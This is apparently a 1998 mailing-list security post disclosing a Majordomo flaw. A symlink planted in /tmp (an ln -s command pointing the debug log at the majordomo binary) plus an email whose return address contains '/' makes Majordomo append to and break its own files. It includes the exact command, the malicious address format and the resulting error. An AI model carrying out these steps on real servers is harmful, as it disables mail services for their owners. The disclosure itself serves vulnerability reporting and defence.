Majordomo /tmp exploit

From: Karl G - NOC Admin (ovrneithat_private)
Date: Thu Mar 26 1998 - 13:03:28 PST


    -=desc=-
    Majordomo allows appending to any file owned by the majordomo user/group.
    
    -=x-ploit=-
    create a symlink in /tmp to any majordomo file
    ex: ln -s /usr/lib/majordomo/majordomo /tmp/majordomo.debug
    
    send a message with any emailer to majordomo with a "/" in the return
    address. (I tested with Winbloze Internet Mail)
    ex: blah/1234at_private
    
    the owner of majordomo will receive the below message... from then on,
    majordomo will be inoperable.  (if the above symlink is used) Majordomo
    keeps a debug log and appends to it every time it crashes without
    checking ownerships of the symlinks.. or for that matter for symlinks at
    all.
    
    --snip--
    Subject: MAJORDOMO ABORT (mj_majordomo)
    
    --
    
    
    MAJORDOMO ABORT (mj_majordomo)!!
    
    HOSTILE ADDRESS (no x400 c=) blah/34234at_private
    --snip--
    
    -=fix=-
    should the wrapper not check for such things?
    
    
    party on.
    
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Karl Grindley
      ICQ: 2660211
      Network Administrator
      TQG Internet Network
    


